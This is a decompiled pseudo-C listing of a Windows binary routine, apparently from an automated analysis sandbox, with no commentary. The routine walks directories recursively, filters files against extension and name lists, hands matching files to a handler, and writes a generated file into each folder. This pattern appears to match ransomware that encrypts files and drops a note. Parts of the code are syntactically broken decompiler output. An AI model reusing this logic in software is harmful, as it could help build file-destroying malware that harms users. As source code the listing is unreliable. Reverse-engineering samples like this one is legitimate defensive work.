                                                                                                    						_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
                                                                                                    						if( &_v80 != _t538) {
                                                                                                    							if(_v60 >= 8) {
                                                                                                    								L00422587(_v80);
                                                                                                    								_t546 = _t546 + 4;
                                                                                                    							}
                                                                                                    							_v60 = 7;
                                                                                                    							_v64 = 0;
                                                                                                    							_v80 = 0;
                                                                                                    							if(_t538[5] >= 8) {
                                                                                                    								_v80 =  *_t538;
                                                                                                    								 *_t538 = 0;
                                                                                                    							} else {
                                                                                                    								_t430 = _t538[4] + 1;
                                                                                                    								if(_t538[4] + 1 != 0) {
                                                                                                    									E004205A0( &_v80, _t538, _t430 + _t430);
                                                                                                    									_t546 = _t546 + 0xc;
                                                                                                    								}
                                                                                                    							}
                                                                                                    							_v64 = _t538[4];
                                                                                                    							_v60 = _t538[5];
                                                                                                    							_t538[5] = 7;
                                                                                                    							_t538[4] = 0;
                                                                                                    							 *_t538 = 0;
                                                                                                    						}
                                                                                                    						if(_v28 >= 8) {
                                                                                                    							L00422587(_v48);
                                                                                                    							_t546 = _t546 + 4;
                                                                                                    						}
                                                                                                    						_t529 = 0;
                                                                                                    						while(_v64 != 0 || _v136 != 0) {
                                                                                                    							_t529 =  &(_t529[0]);
                                                                                                    							_t313 =  >=  ? _v80 :  &_v80;
                                                                                                    							_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
                                                                                                    							if( *_t515 != 0) {
                                                                                                    								_t472 = _t515;
                                                                                                    								_t107 = _t472 + 2; // 0x2
                                                                                                    								_t538 = _t107;
                                                                                                    								do {
                                                                                                    									_t315 =  *_t472;
                                                                                                    									_t472 = _t472 + 2;
                                                                                                    								} while (_t315 != 0);
                                                                                                    								_t474 = _t472 - _t538 >> 1;
                                                                                                    								L42:
                                                                                                    								_push(_t474);
                                                                                                    								E00415C10(_t457,  &_v152, _t529, _t538, _t515);
                                                                                                    								_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
                                                                                                    								if( &_v80 != _t538) {
                                                                                                    									if(_v60 >= 8) {
                                                                                                    										L00422587(_v80);
                                                                                                    										_t546 = _t546 + 4;
                                                                                                    									}
                                                                                                    									_v60 = 7;
                                                                                                    									_v64 = 0;
                                                                                                    									_v80 = 0;
                                                                                                    									if(_t538[5] >= 8) {
                                                                                                    										_v80 =  *_t538;
                                                                                                    										 *_t538 = 0;
                                                                                                    									} else {
                                                                                                    										_t418 = _t538[4] + 1;
                                                                                                    										if(_t538[4] + 1 != 0) {
                                                                                                    											E004205A0( &_v80, _t538, _t418 + _t418);
                                                                                                    											_t546 = _t546 + 0xc;
                                                                                                    										}
                                                                                                    									}
                                                                                                    									_v64 = _t538[4];
                                                                                                    									_v60 = _t538[5];
                                                                                                    									_t538[5] = 7;
                                                                                                    									_t538[4] = 0;
                                                                                                    									 *_t538 = 0;
                                                                                                    								}
                                                                                                    								if(_v28 >= 8) {
                                                                                                    									L00422587(_v48);
                                                                                                    									_t546 = _t546 + 4;
                                                                                                    								}
                                                                                                    								continue;
                                                                                                    							}
                                                                                                    							_t474 = 0;
                                                                                                    							goto L42;
                                                                                                    						}
                                                                                                    						if(_t529 > 3) {
                                                                                                    							L73:
                                                                                                    							_t322 = E00417140( &_v104,  &_a4, "*");
                                                                                                    							_t547 = _t546 + 4;
                                                                                                    							if(_t322[0xa] >= 8) {
                                                                                                    								_t322 =  *_t322;
                                                                                                    							}
                                                                                                    							_t323 = FindFirstFileW(_t322,  &_v796);
                                                                                                    							_v52 = _t323;
                                                                                                    							if(_v84 >= 8) {
                                                                                                    								L00422587(_v104);
                                                                                                    								_t323 = _v52;
                                                                                                    								_t547 = _t547 + 4;
                                                                                                    							}
                                                                                                    							_v84 = 7;
                                                                                                    							_t458 = 0;
                                                                                                    							_v88 = 0;
                                                                                                    							_v104 = 0;
                                                                                                    							_v24 = 0;
                                                                                                    							if(_t323 == 0xffffffff) {
                                                                                                    								L139:
                                                                                                    								if(_v132 >= 8) {
                                                                                                    									L00422587(_v152);
                                                                                                    									_t547 = _t547 + 4;
                                                                                                    								}
                                                                                                    								_v132 = 7;
                                                                                                    								_v136 = 0;
                                                                                                    								_v152 = 0;
                                                                                                    								if(_v60 >= 8) {
                                                                                                    									L00422587(_v80);
                                                                                                    									_t547 = _t547 + 4;
                                                                                                    								}
                                                                                                    								_v60 = 7;
                                                                                                    								_v64 = 0;
                                                                                                    								_v80 = 0;
                                                                                                    								if(_v108 >= 8) {
                                                                                                    									L00422587(_v128);
                                                                                                    									_t547 = _t547 + 4;
                                                                                                    								}
                                                                                                    								_t326 = 0;
                                                                                                    								_v108 = 7;
                                                                                                    								_v112 = 0;
                                                                                                    								_v128 = 0;
                                                                                                    								goto L146;
                                                                                                    							} else {
                                                                                                    								_t540 = _v52;
                                                                                                    								do {
                                                                                                    									_t481 = ".";
                                                                                                    									_t330 =  &(_v796.cFileName);
                                                                                                    									while(1) {
                                                                                                    										_t517 =  *_t330;
                                                                                                    										if(_t517 !=  *_t481) {
                                                                                                    											break;
                                                                                                    										}
                                                                                                    										if(_t517 == 0) {
                                                                                                    											L84:
                                                                                                    											_t331 = 0;
                                                                                                    											L86:
                                                                                                    											if(_t331 == 0) {
                                                                                                    												goto L137;
                                                                                                    											}
                                                                                                    											_t482 = L"..";
                                                                                                    											_t335 =  &(_v796.cFileName);
                                                                                                    											while(1) {
                                                                                                    												_t518 =  *_t335;
                                                                                                    												if(_t518 !=  *_t482) {
                                                                                                    													break;
                                                                                                    												}
                                                                                                    												if(_t518 == 0) {
                                                                                                    													L92:
                                                                                                    													_t336 = 0;
                                                                                                    													L94:
                                                                                                    													if(_t336 == 0) {
                                                                                                    														goto L137;
                                                                                                    													}
                                                                                                    													if((_v796.dwFileAttributes & 0x00000010) == 0) {
                                                                                                    														_t460 = _t458 + 1;
                                                                                                    														_v24 = _t460;
                                                                                                    														if(_t460 >= 0x400) {
                                                                                                    															_v24 = 0;
                                                                                                    															E00411AB0();
                                                                                                    														}
                                                                                                    														if(_a32 == 0) {
                                                                                                    															goto L137;
                                                                                                    														} else {
                                                                                                    															_v28 = 7;
                                                                                                    															_push(0xffffffff);
                                                                                                    															_v48 = 0;
                                                                                                    															_v32 = 0;
                                                                                                    															E00414690(_t460,  &_v48,  &_a4, 0);
                                                                                                    															_v8 = 9;
                                                                                                    															if(_v796.cFileName != 0) {
                                                                                                    																_t484 =  &(_v796.cFileName);
                                                                                                    																_t241 = _t484 + 2; // 0x2
                                                                                                    																_t519 = _t241;
                                                                                                    																do {
                                                                                                    																	_t340 =  *_t484;
                                                                                                    																	_t484 = _t484 + 2;
                                                                                                    																} while (_t340 != 0);
                                                                                                    																_t486 = _t484 - _t519 >> 1;
                                                                                                    																L108:
                                                                                                    																_push(_t486);
                                                                                                    																_t487 =  &_v48;
                                                                                                    																E00415AE0(_t460,  &_v48, _t529, _t540,  &(_v796.cFileName));
                                                                                                    																_t344 =  >=  ? _v48 :  &_v48;
                                                                                                    																_t461 = PathFindExtensionW( >=  ? _v48 :  &_v48);
                                                                                                    																_v17 = 0;
                                                                                                    																_t346 = _v56;
                                                                                                    																_t541 =  *((intOrPtr*)(_t346 + 0x88c));
                                                                                                    																_t531 =  *((intOrPtr*)(_t346 + 0x890));
                                                                                                    																if(_t541 == _t531) {
                                                                                                    																	L118:
                                                                                                    																	_t542 =  *((intOrPtr*)(_t346 + 0x898));
                                                                                                    																	_t529 =  *(_t346 + 0x89c);
                                                                                                    																	if(_t542 == _t529) {
                                                                                                    																		L126:
                                                                                                    																		if(_v17 == 0) {
                                                                                                    																			_t348 = _t346 + 0x868;
                                                                                                    																			if( *((intOrPtr*)(_t348 + 0x14)) >= 8) {
                                                                                                    																				_t348 =  *_t348;
                                                                                                    																			}
                                                                                                    																			_push(_t461);
                                                                                                    																			_push(_t348);
                                                                                                    																			_t349 = E00421C02(_t487);
                                                                                                    																			_t547 = _t547 + 8;
                                                                                                    																			if(_t349 == 0) {
                                                                                                    																				_t462 = _v56;
                                                                                                    																				_t488 = _t462 + 0x820;
                                                                                                    																				if( *((intOrPtr*)(_t462 + 0x834)) >= 8) {
                                                                                                    																					_t488 =  *_t488;
                                                                                                    																				}
                                                                                                    																				_push(_t488);
                                                                                                    																				_t351 =  >=  ? _v48 :  &_v48;
                                                                                                    																				_push( >=  ? _v48 :  &_v48);
                                                                                                    																				_t352 = E00421C02(_t488);
                                                                                                    																				_t547 = _t547 + 8;
                                                                                                    																				if(_t352 == 0) {
                                                                                                    																					_t521 =  >=  ? _v48 :  &_v48;
                                                                                                    																					E004111C0(_t462,  >=  ? _v48 :  &_v48);
                                                                                                    																				}
                                                                                                    																			}
                                                                                                    																		}
                                                                                                    																		L134:
                                                                                                    																		_v8 = 5;
                                                                                                    																		if(_v28 >= 8) {
                                                                                                    																			L00422587(_v48);
                                                                                                    																			_t547 = _t547 + 4;
                                                                                                    																		}
                                                                                                    																		_t540 = _v52;
                                                                                                    																		goto L137;
                                                                                                    																	}
                                                                                                    																	L120:
                                                                                                    																	L120:
                                                                                                    																	if( *((intOrPtr*)(_t542 + 0x14)) < 8) {
                                                                                                    																		_t354 = _t542;
                                                                                                    																	} else {
                                                                                                    																		_t354 =  *_t542;
                                                                                                    																	}
                                                                                                    																	_t487 =  &(_v796.cFileName);
                                                                                                    																	_push( &(_v796.cFileName));
                                                                                                    																	_push(_t354);
                                                                                                    																	_t355 = E00421C02( &(_v796.cFileName));
                                                                                                    																	_t547 = _t547 + 8;
                                                                                                    																	if(_t355 != 0) {
                                                                                                    																		goto L134;
                                                                                                    																	}
                                                                                                    																	_t542 = _t542 + 0x18;
                                                                                                    																	if(_t542 != _t529) {
                                                                                                    																		goto L120;
                                                                                                    																	}
                                                                                                    																	_t346 = _v56;
                                                                                                    																	goto L126;
                                                                                                    																}
                                                                                                    																L110:
                                                                                                    																L110:
                                                                                                    																if( *((intOrPtr*)(_t541 + 0x14)) < 8) {
                                                                                                    																	_t356 = _t541;
                                                                                                    																} else {
                                                                                                    																	_t356 =  *_t541;
                                                                                                    																}
                                                                                                    																_push(_t461);
                                                                                                    																_push(_t356);
                                                                                                    																_t357 = E00421C02(_t487);
                                                                                                    																_t547 = _t547 + 8;
                                                                                                    																if(_t357 != 0) {
                                                                                                    																	goto L116;
                                                                                                    																}
                                                                                                    																_t541 = _t541 + 0x18;
                                                                                                    																if(_t541 != _t531) {
                                                                                                    																	goto L110;
                                                                                                    																}
                                                                                                    																L117:
                                                                                                    																_t346 = _v56;
                                                                                                    																goto L118;
                                                                                                    																L116:
                                                                                                    																_v17 = 1;
                                                                                                    																goto L117;
                                                                                                    															}
                                                                                                    															_t486 = 0;
                                                                                                    															goto L108;
                                                                                                    														}
                                                                                                    													}
                                                                                                    													E00417140( &_v204,  &_a4,  &(_v796.cFileName));
                                                                                                    													_t547 = _t547 + 4;
                                                                                                    													_push(1);
                                                                                                    													_v8 = 7;
                                                                                                    													E00415AE0(_t458,  &_v204, _t529, _t540, "\\");
                                                                                                    													_v160 = 7;
                                                                                                    													_v164 = 0;
                                                                                                    													_v180 = 0;
                                                                                                    													_push(0xffffffff);
                                                                                                    													_v8 = 8;
                                                                                                    													E00414690(_t458,  &_v180,  &_v204, 0);
                                                                                                    													_v156 = 0;
                                                                                                    													E00413B70(_a28,  &_v180);
                                                                                                    													if(_v160 >= 8) {
                                                                                                    														L00422587(_v180);
                                                                                                    														_t547 = _t547 + 4;
                                                                                                    													}
                                                                                                    													_v8 = 5;
                                                                                                    													_v160 = 7;
                                                                                                    													_v164 = 0;
                                                                                                    													_v180 = 0;
                                                                                                    													if(_v184 >= 8) {
                                                                                                    														L00422587(_v204);
                                                                                                    														_t547 = _t547 + 4;
                                                                                                    													}
                                                                                                    													goto L137;
                                                                                                    												}
                                                                                                    												_t523 =  *((intOrPtr*)(_t335 + 2));
                                                                                                    												_t204 =  &(_t482[2]); // 0x2e
                                                                                                    												if(_t523 !=  *_t204) {
                                                                                                    													break;
                                                                                                    												}
                                                                                                    												_t335 = _t335 + 4;
                                                                                                    												_t482 =  &(_t482[4]);
                                                                                                    												if(_t523 != 0) {
                                                                                                    													continue;
                                                                                                    												}
                                                                                                    												goto L92;
                                                                                                    											}
                                                                                                    											asm("sbb eax, eax");
                                                                                                    											_t336 = _t335 | 0x00000001;
                                                                                                    											goto L94;
                                                                                                    										}
                                                                                                    										_t524 =  *((intOrPtr*)(_t330 + 2));
                                                                                                    										_t201 =  &(_t481[2]); // 0x2e0000
                                                                                                    										if(_t524 !=  *_t201) {
                                                                                                    											break;
                                                                                                    										}
                                                                                                    										_t330 = _t330 + 4;
                                                                                                    										_t481 =  &(_t481[4]);
                                                                                                    										if(_t524 != 0) {
                                                                                                    											continue;
                                                                                                    										}
                                                                                                    										goto L84;
                                                                                                    									}
                                                                                                    									asm("sbb eax, eax");
                                                                                                    									_t331 = _t330 | 0x00000001;
                                                                                                    									goto L86;
                                                                                                    									L137:
                                                                                                    									_t333 = FindNextFileW(_t540,  &_v796);
                                                                                                    									_t458 = _v24;
                                                                                                    								} while (_t333 != 0);
                                                                                                    								FindClose(_t540);
                                                                                                    								goto L139;
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t549 = _t546 - 0x18;
                                                                                                    						_t494 = _t549;
                                                                                                    						_push(0xffffffff);
                                                                                                    						 *(_t494 + 0x14) = 7;
                                                                                                    						 *(_t494 + 0x10) = 0;
                                                                                                    						 *_t494 = 0;
                                                                                                    						E00414690(_t457, _t494,  &_a4, 0);
                                                                                                    						_t374 = E0040F310(_t529, _t538);
                                                                                                    						_t546 = _t549 + 0x18;
                                                                                                    						if(_t374 != 0) {
                                                                                                    							goto L73;
                                                                                                    						}
                                                                                                    						_push(0xffffffff);
                                                                                                    						E00414690(_t457,  &_v128,  &_a4, 0);
                                                                                                    						E00413A90(_t457,  &_v92, _t529, _v112 + 0x400);
                                                                                                    						_v8 = 6;
                                                                                                    						_t497 = 0;
                                                                                                    						_t380 = _v112;
                                                                                                    						_t543 = _v92;
                                                                                                    						if(_t380 == 0) {
                                                                                                    							L57:
                                                                                                    							_t463 = _v56;
                                                                                                    							 *((short*)(_t543 + 2 + _t380 * 2)) = 0;
                                                                                                    							_t381 = _t463 + 0x820;
                                                                                                    							if(_t381[0xa] >= 8) {
                                                                                                    								_t381 =  *_t381;
                                                                                                    							}
                                                                                                    							PathAppendW(_t543, _t381);
                                                                                                    							_push(_v24);
                                                                                                    							_v28 = 7;
                                                                                                    							_v32 = 0;
                                                                                                    							_v48 = 0;
                                                                                                    							E00418400( &_v48, _t543, _v88);
                                                                                                    							if(_v108 >= 8) {
                                                                                                    								L00422587(_v128);
                                                                                                    								_t546 = _t546 + 4;
                                                                                                    							}
                                                                                                    							_t500 = _v28;
                                                                                                    							_v108 = 7;
                                                                                                    							_v112 = 0;
                                                                                                    							_v128 = 0;
                                                                                                    							if(_t500 >= 8) {
                                                                                                    								_v128 = _v48;
                                                                                                    							} else {
                                                                                                    								_t402 = _v32 + 1;
                                                                                                    								if(_v32 + 1 != 0) {
                                                                                                    									E004205A0( &_v128,  &_v48, _t402 + _t402);
                                                                                                    									_t500 = _v28;
                                                                                                    									_t546 = _t546 + 0xc;
                                                                                                    								}
                                                                                                    							}
                                                                                                    							_v112 = _v32;
                                                                                                    							_t389 =  >=  ? _v128 :  &_v128;
                                                                                                    							_v108 = _t500;
                                                                                                    							if(PathFileExistsW( >=  ? _v128 :  &_v128) == 0) {
                                                                                                    								_t392 = E00420C62(_t463, _t515, _t529, 0x7d00);
                                                                                                    								_t501 = _t463 + 0x838;
                                                                                                    								_t550 = _t546 + 4;
                                                                                                    								_t529 = _t392;
                                                                                                    								if(_t501[0xa] >= 8) {
                                                                                                    									_t501 =  *_t501;
                                                                                                    								}
                                                                                                    								lstrcpyW(_t529, _t501);
                                                                                                    								_t394 = _t463 + 0x850;
                                                                                                    								if( *((intOrPtr*)(_t463 + 0x864)) >= 8) {
                                                                                                    									_t394 =  *_t394;
                                                                                                    								}
                                                                                                    								lstrcatW(_t529, _t394);
                                                                                                    								_t551 = _t550 - 0x18;
                                                                                                    								_t502 = _t551;
                                                                                                    								_push(0xffffffff);
                                                                                                    								 *(_t502 + 0x14) = 7;
                                                                                                    								 *(_t502 + 0x10) = 0;
                                                                                                    								 *_t502 = 0;
                                                                                                    								E00414690(_t463, _t502,  &_v128, 0);
                                                                                                    								E0040F0E0(_t529);
                                                                                                    								E00420BED(_t529);
                                                                                                    								_t546 = _t551 + 0x1c;
                                                                                                    							}
                                                                                                    							_v8 = 5;
                                                                                                    							if(_t543 != 0) {
                                                                                                    								L00422587(_t543);
                                                                                                    								_t546 = _t546 + 4;
                                                                                                    							}
                                                                                                    							goto L73;
                                                                                                    						}
                                                                                                    						do {
                                                                                                    							_t409 =  >=  ? _v128 :  &_v128;
                                                                                                    							_t543[_t497] = ( >=  ? _v128 :  &_v128)[_t497];
                                                                                                    							_t497 = _t497 + 1;
                                                                                                    							_t380 = _v112;
                                                                                                    						} while (_t497 < _t380);
                                                                                                    						goto L57;
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					_t464 = 0;
                                                                                                    					do {
                                                                                                    						_v28 = 7;
                                                                                                    						_push(0xffffffff);
                                                                                                    						_v48 = 0;
                                                                                                    						_v32 = 0;
                                                                                                    						E00414690(_t464,  &_v48,  &_a4, 0);
                                                                                                    						_v8 = 1;
                                                                                                    						_push(0xffffffff);
                                                                                                    						_v104 = 0;
                                                                                                    						_v84 = 7;
                                                                                                    						_v88 = 0;
                                                                                                    						E00414690(_t464,  &_v104,  *_v24 + _t464, 0);
                                                                                                    						_v8 = 2;
                                                                                                    						_t525 = _v32;
                                                                                                    						if(_t525 <= 1) {
                                                                                                    							L10:
                                                                                                    							if(_v84 >= 8) {
                                                                                                    								L00422587(_v104);
                                                                                                    								_t546 = _t546 + 4;
                                                                                                    							}
                                                                                                    							_v84 = 7;
                                                                                                    							_v8 = 0;
                                                                                                    							_v88 = 0;
                                                                                                    							_v104 = 0;
                                                                                                    							if(_v28 >= 8) {
                                                                                                    								L00422587(_v48);
                                                                                                    								_t546 = _t546 + 4;
                                                                                                    							}
                                                                                                    							goto L14;
                                                                                                    						}
                                                                                                    						_t507 = _v88;
                                                                                                    						if(_t507 <= 1) {
                                                                                                    							goto L10;
                                                                                                    						} else {
                                                                                                    							_t446 =  >=  ? _v48 :  &_v48;
                                                                                                    							if( *((short*)(( >=  ? _v48 :  &_v48) + _t525 * 2 - 2)) != 0x5c) {
                                                                                                    								_push(1);
                                                                                                    								E00415AE0(_t464,  &_v48, _t528, _t537, "\\");
                                                                                                    								_t507 = _v88;
                                                                                                    							}
                                                                                                    							_t544 = _v104;
                                                                                                    							_t448 =  >=  ? _t544 :  &_v104;
                                                                                                    							if( *((short*)(( >=  ? _t544 :  &_v104) + _t507 * 2 - 2)) != 0x5c) {
                                                                                                    								_push(1);
                                                                                                    								E00415AE0(_t464,  &_v104, _t528, _t544, "\\");
                                                                                                    								_t544 = _v104;
                                                                                                    							}
                                                                                                    							_t509 =  >=  ? _t544 :  &_v104;
                                                                                                    							_t450 =  >=  ? _v48 :  &_v48;
                                                                                                    							_t451 = E00420235(_t464, _t528, _t544,  >=  ? _v48 :  &_v48,  >=  ? _t544 :  &_v104);
                                                                                                    							_t547 = _t546 + 8;
                                                                                                    							if(_t451 == 0) {
                                                                                                    								if(_v84 >= 8) {
                                                                                                    									L00422587(_v104);
                                                                                                    									_t547 = _t547 + 4;
                                                                                                    								}
                                                                                                    								_t326 = 0;
                                                                                                    								_v84 = 7;
                                                                                                    								_v88 = 0;
                                                                                                    								_v104 = 0;
                                                                                                    								if(_v28 >= 8) {
                                                                                                    									_t326 = L00422587(_v48);
                                                                                                    									_t547 = _t547 + 4;
                                                                                                    								}
                                                                                                    								L146:
                                                                                                    								if(_a24 >= 8) {
                                                                                                    									_t326 = L00422587(_a4);
                                                                                                    								}
                                                                                                    								 *[fs:0x0] = _v16;
                                                                                                    								return _t326;
                                                                                                    							} else {
                                                                                                    								_t537 = _v52;
                                                                                                    								goto L10;
                                                                                                    							}
                                                                                                    						}
                                                                                                    						L14:
                                                                                                    						_t528 = _t528 + 1;
                                                                                                    						_t464 = _t464 + 0x18;
                                                                                                    					} while (_t528 < _t537);
                                                                                                    					goto L15;
                                                                                                    				}
                                                                                                    			}










































































































                                                                                                    0x0040f733
                                                                                                    0x0040f735
                                                                                                    0x0040f740
                                                                                                    0x0040f741
                                                                                                    0x0040f748
                                                                                                    0x0040f750
                                                                                                    0x0040f752
                                                                                                    0x0040f756
                                                                                                    0x0040f759
                                                                                                    0x0040f760
                                                                                                    0x0040f76f
                                                                                                    0x0040f77e
                                                                                                    0x0040f780
                                                                                                    0x0040f783
                                                                                                    0x0040f8b5
                                                                                                    0x0040f8b7
                                                                                                    0x0040f8be
                                                                                                    0x0040f8c5
                                                                                                    0x0040f8c9
                                                                                                    0x0040f8d0
                                                                                                    0x0040f8d3
                                                                                                    0x0040f8d6
                                                                                                    0x0040f8de
                                                                                                    0x0040f8e5
                                                                                                    0x0040f8ea
                                                                                                    0x0040f8f5
                                                                                                    0x0040f8fb
                                                                                                    0x0040f902
                                                                                                    0x0040f904
                                                                                                    0x0040f90d
                                                                                                    0x0040f917
                                                                                                    0x0040f921
                                                                                                    0x0040f966
                                                                                                    0x0040f968
                                                                                                    0x0040f968
                                                                                                    0x0040f970
                                                                                                    0x0040f970
                                                                                                    0x0040f973
                                                                                                    0x0040f976
                                                                                                    0x0040f97d
                                                                                                    0x00000000
                                                                                                    0x0040f923
                                                                                                    0x0040f923
                                                                                                    0x0040f97f
                                                                                                    0x0040f97f
                                                                                                    0x0040f987
                                                                                                    0x0040f98c
                                                                                                    0x0040f9a8
                                                                                                    0x0040f9af
                                                                                                    0x0040f9b5
                                                                                                    0x0040f9ba
                                                                                                    0x0040f9bf
                                                                                                    0x0040f9bf
                                                                                                    0x0040f9c4
                                                                                                    0x0040f9cb
                                                                                                    0x0040f9d2
                                                                                                    0x0040f9da
                                                                                                    0x0040f9f6
                                                                                                    0x0040f9f9
                                                                                                    0x0040f9dc
                                                                                                    0x0040f9df
                                                                                                    0x0040f9e0
                                                                                                    0x0040f9ea
                                                                                                    0x0040f9ef
                                                                                                    0x0040f9ef
                                                                                                    0x0040f9e0
                                                                                                    0x0040fa02
                                                                                                    0x0040fa08
                                                                                                    0x0040fa0d
                                                                                                    0x0040fa14
                                                                                                    0x0040fa1b
                                                                                                    0x0040fa1b
                                                                                                    0x0040fa22
                                                                                                    0x0040fa27
                                                                                                    0x0040fa2c
                                                                                                    0x0040fa2c
                                                                                                    0x0040fa2f
                                                                                                    0x0040fa31
                                                                                                    0x0040fa44
                                                                                                    0x0040fa4c
                                                                                                    0x0040fa53
                                                                                                    0x0040fa59
                                                                                                    0x0040fa5f
                                                                                                    0x0040fa61
                                                                                                    0x0040fa61
                                                                                                    0x0040fa64
                                                                                                    0x0040fa64
                                                                                                    0x0040fa67
                                                                                                    0x0040fa6a
                                                                                                    0x0040fa71
                                                                                                    0x0040fa73
                                                                                                    0x0040fa73
                                                                                                    0x0040fa7b
                                                                                                    0x0040fa98
                                                                                                    0x0040fa9f
                                                                                                    0x0040faa5
                                                                                                    0x0040faaa
                                                                                                    0x0040faaf
                                                                                                    0x0040faaf
                                                                                                    0x0040fab4
                                                                                                    0x0040fabb
                                                                                                    0x0040fac2
                                                                                                    0x0040faca
                                                                                                    0x0040fae6
                                                                                                    0x0040fae9
                                                                                                    0x0040facc
                                                                                                    0x0040facf
                                                                                                    0x0040fad0
                                                                                                    0x0040fada
                                                                                                    0x0040fadf
                                                                                                    0x0040fadf
                                                                                                    0x0040fad0
                                                                                                    0x0040faf2
                                                                                                    0x0040faf8
                                                                                                    0x0040fafd
                                                                                                    0x0040fb04
                                                                                                    0x0040fb0b
                                                                                                    0x0040fb0b
                                                                                                    0x0040fb12
                                                                                                    0x0040fb1b
                                                                                                    0x0040fb20
                                                                                                    0x0040fb20
                                                                                                    0x00000000
                                                                                                    0x0040fb12
                                                                                                    0x0040fa5b
                                                                                                    0x00000000
                                                                                                    0x0040fa5b
                                                                                                    0x0040fb2b
                                                                                                    0x0040fcf0
                                                                                                    0x0040fcfb
                                                                                                    0x0040fd00
                                                                                                    0x0040fd07
                                                                                                    0x0040fd09
                                                                                                    0x0040fd09
                                                                                                    0x0040fd13
                                                                                                    0x0040fd1d
                                                                                                    0x0040fd20
                                                                                                    0x0040fd25
                                                                                                    0x0040fd2a
                                                                                                    0x0040fd2d
                                                                                                    0x0040fd2d
                                                                                                    0x0040fd32
                                                                                                    0x0040fd39
                                                                                                    0x0040fd3b
                                                                                                    0x0040fd42
                                                                                                    0x0040fd46
                                                                                                    0x0040fd4c
                                                                                                    0x00410072
                                                                                                    0x00410076
                                                                                                    0x0041007e
                                                                                                    0x00410083
                                                                                                    0x00410083
                                                                                                    0x00410088
                                                                                                    0x00410093
                                                                                                    0x0041009d
                                                                                                    0x004100a4
                                                                                                    0x004100a9
                                                                                                    0x004100ae
                                                                                                    0x004100ae
                                                                                                    0x004100b3
                                                                                                    0x004100be
                                                                                                    0x004100c5
                                                                                                    0x004100c9
                                                                                                    0x004100ce
                                                                                                    0x004100d3
                                                                                                    0x004100d3
                                                                                                    0x004100d6
                                                                                                    0x004100d8
                                                                                                    0x004100df
                                                                                                    0x004100e6
                                                                                                    0x00000000
                                                                                                    0x0040fd52
                                                                                                    0x0040fd52
                                                                                                    0x0040fd60
                                                                                                    0x0040fd60
                                                                                                    0x0040fd65
                                                                                                    0x0040fd70
                                                                                                    0x0040fd70
                                                                                                    0x0040fd76
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040fd7b
                                                                                                    0x0040fd92
                                                                                                    0x0040fd92
                                                                                                    0x0040fd9b
                                                                                                    0x0040fd9d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040fda3
                                                                                                    0x0040fda8
                                                                                                    0x0040fdb0
                                                                                                    0x0040fdb0
                                                                                                    0x0040fdb6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040fdbb
                                                                                                    0x0040fdd2
                                                                                                    0x0040fdd2
                                                                                                    0x0040fddb
                                                                                                    0x0040fddd
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040fdea
                                                                                                    0x0040fec2
                                                                                                    0x0040fec3
                                                                                                    0x0040fecc
                                                                                                    0x0040fece
                                                                                                    0x0040fed5
                                                                                                    0x0040fed5
                                                                                                    0x0040fede
                                                                                                    0x00000000
                                                                                                    0x0040fee4
                                                                                                    0x0040fee6
                                                                                                    0x0040feed
                                                                                                    0x0040fef0
                                                                                                    0x0040fefa
                                                                                                    0x0040ff02
                                                                                                    0x0040ff07
                                                                                                    0x0040ff13
                                                                                                    0x0040ff19
                                                                                                    0x0040ff1f
                                                                                                    0x0040ff1f
                                                                                                    0x0040ff22
                                                                                                    0x0040ff22
                                                                                                    0x0040ff25
                                                                                                    0x0040ff28
                                                                                                    0x0040ff2f
                                                                                                    0x0040ff31
                                                                                                    0x0040ff31
                                                                                                    0x0040ff39
                                                                                                    0x0040ff3c
                                                                                                    0x0040ff48
                                                                                                    0x0040ff53
                                                                                                    0x0040ff55
                                                                                                    0x0040ff59
                                                                                                    0x0040ff5c
                                                                                                    0x0040ff62
                                                                                                    0x0040ff6a
                                                                                                    0x0040ff9a
                                                                                                    0x0040ff9a
                                                                                                    0x0040ffa0
                                                                                                    0x0040ffa8
                                                                                                    0x0040ffda
                                                                                                    0x0040ffde
                                                                                                    0x0040ffe0
                                                                                                    0x0040ffe9
                                                                                                    0x0040ffeb
                                                                                                    0x0040ffeb
                                                                                                    0x0040ffed
                                                                                                    0x0040ffee
                                                                                                    0x0040ffef
                                                                                                    0x0040fff4
                                                                                                    0x0040fff9
                                                                                                    0x0040fffb
                                                                                                    0x00410005
                                                                                                    0x0041000b
                                                                                                    0x0041000d
                                                                                                    0x0041000d
                                                                                                    0x00410016
                                                                                                    0x00410017
                                                                                                    0x0041001b
                                                                                                    0x0041001c
                                                                                                    0x00410021
                                                                                                    0x00410026
                                                                                                    0x00410031
                                                                                                    0x00410035
                                                                                                    0x00410035
                                                                                                    0x00410026
                                                                                                    0x0040fff9
                                                                                                    0x0041003a
                                                                                                    0x0041003a
                                                                                                    0x00410042
                                                                                                    0x00410047
                                                                                                    0x0041004c
                                                                                                    0x0041004c
                                                                                                    0x0041004f
                                                                                                    0x00000000
                                                                                                    0x0041004f
                                                                                                    0x00000000
                                                                                                    0x0040ffb0
                                                                                                    0x0040ffb4
                                                                                                    0x0040ffba
                                                                                                    0x0040ffb6
                                                                                                    0x0040ffb6
                                                                                                    0x0040ffb6
                                                                                                    0x0040ffbc
                                                                                                    0x0040ffc2
                                                                                                    0x0040ffc3
                                                                                                    0x0040ffc4
                                                                                                    0x0040ffc9
                                                                                                    0x0040ffce
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040ffd0
                                                                                                    0x0040ffd5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040ffd7
                                                                                                    0x00000000
                                                                                                    0x0040ffd7
                                                                                                    0x00000000
                                                                                                    0x0040ff70
                                                                                                    0x0040ff74
                                                                                                    0x0040ff7a
                                                                                                    0x0040ff76
                                                                                                    0x0040ff76
                                                                                                    0x0040ff76
                                                                                                    0x0040ff7c
                                                                                                    0x0040ff7d
                                                                                                    0x0040ff7e
                                                                                                    0x0040ff83
                                                                                                    0x0040ff88
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040ff8a
                                                                                                    0x0040ff8f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040ff97
